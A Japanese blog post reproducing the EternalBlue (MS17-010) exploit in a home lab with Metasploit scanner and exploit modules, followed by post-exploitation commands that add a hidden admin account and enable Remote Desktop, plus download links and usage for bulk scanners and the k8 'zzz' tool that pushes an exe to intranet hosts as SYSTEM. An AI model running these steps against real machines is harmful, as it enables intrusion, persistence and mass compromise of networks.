banner
肥皂的小屋

肥皂的小屋

github
steam
bilibili
douban
tg_channel

永遠の青-ETERNALBLUEの脆弱性MS17-010の利用手順

事の発端#

前回の WannaCry が世界中を席巻してから 1 年以上が経ちましたが、再現することはまだ価値があります。

参考記事:

環境の準備#

  • Kali:192.168.2.6
  • Win7_SP1:192.168.2.7:デフォルトで Administrator アカウントはパスワードがありません
  • WinXP_SP3:192.168.2.4

Metasploit の使用#

モジュールの検索#

Metasploit を使用してスキャンと攻撃を行うために、まず ms17_010 に関するモジュールを確認しましょう:

image

スキャンモジュールは以下のようになります

auxiliary/admin/smb/ms17_010_command

または以下のモジュールを使用します

auxiliary/scanner/smb/smb_ms17_010

攻撃モジュールはexploit/windows/smb/ms17_010_eternalblueを使用します

スキャンモジュールを使用してスキャンする#

auxiliary/admin/smb/ms17_010_command

image

WinXP はスキャンに成功しましたが、Win7 はスキャンできませんでしたので、別のスキャンモジュールを試してみましょう:

auxiliary/scanner/smb/smb_ms17_010

image

このモジュールでは、2 つのターゲットが攻撃可能と判断されました。

攻撃モジュールを使用して攻撃する#

exploit/windows/smb/ms17_010_eternalblue

image

ファイアウォールがオンの場合は攻撃できませんが、オフにすると攻撃できます。

ターゲットマシンを制御する#

ここで、シェルで日本語が文字化けする問題について補足します:

chcp 65001と入力してください

image

ユーザーの作成と管理者グループへの追加#

net user soapffz adminpasswd /add
net localgroup administrators soapffz /add

image

リモートデスクトップ機能の有効化#

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

無効化する場合は以下のコマンドを使用します:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

image

リモートデスクトップ接続#

image

自分のコンピューターが他のアカウントでログインしている場合、このリモートデスクトップウィンドウは約 20 秒待機し続けます。応答がない場合、管理者アカウントがログアウトされ、デスクトップにアクセスできます:

image

Windows の検出と攻撃ツール#

EternalBlues バルクスキャンツール#

ダウンロードリンク:http://omerez.com/repository/EternalBlues.exe

現在のコンピューターが存在するローカルネットワーク内のホストに対して ms17_010 の脆弱性をバルクスキャンできます(高速):

image

MS_17_010_Scanv2.1 スキャンツール#

ダウンロードリンク:https://www.lanzous.com/i359xch

スキャン速度は遅いです:

image

cping バルクスキャンツール(19-02-23 更新)#

紹介と使用方法の参考記事:内部ネットワーク - 生存ホストのスキャン

k8 強化版 zzz 攻撃ツール(19-02-23 更新)#

内部ネットワークのバルク MS17-010 オーバーフローツール、k8 チームからのもの:https://www.cnblogs.com/k8gege/p/10391101.html

以下のチュートリアルは k8 からの引用です:

ツール:k8強化版zzz

コンパイル:Python

脆弱性:MS17-010

使用方法:

zzz_exploit.exe 192.11.22.82
zzz_exploit.exe 192.11.22.82 exeパラメータ
zzz_exploit.exe 192.11.22.82 exeパラメータ パイプ名

例えば、exeの起動パラメータがm.exe -Startの場合、実戦コマンドはzzz_exploit.exe 192.11.22.82 -Startです。

内部ネットワークのバルク

cpingと組み合わせて内部ネットワークをオーバーフローするため、名前をsmbcheckに変更する必要がありますが、exeは引数なしバージョンを使用する必要があります。(他のツールでもIPパラメータを提供するだけで使用できます)

cpingはIPのみを渡すため、他のパラメータは渡しません。使用する前に任意のexeをma.datに変更する必要があります。

オーバーフローが成功すると、exeがターゲットマシンに自動的に転送され、システム権限でexeプログラムが起動します。

まず、exe プログラムを実行しない場合の効果を試してみましょう:

image

次に、クラシックな IP レーダーツールをチュートリアルに従って ma.dat に名前を変更してフォルダに配置します:

image

そして、もう一度試してみましょう:

image

C:\WINDOWS\Temp\msupdate.exeに IP レーダーの exe がアップロードされたことがわかりますが、これはバックドアではないため、サービスの起動に失敗しました:

image

大まかな使い方は以上です。

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。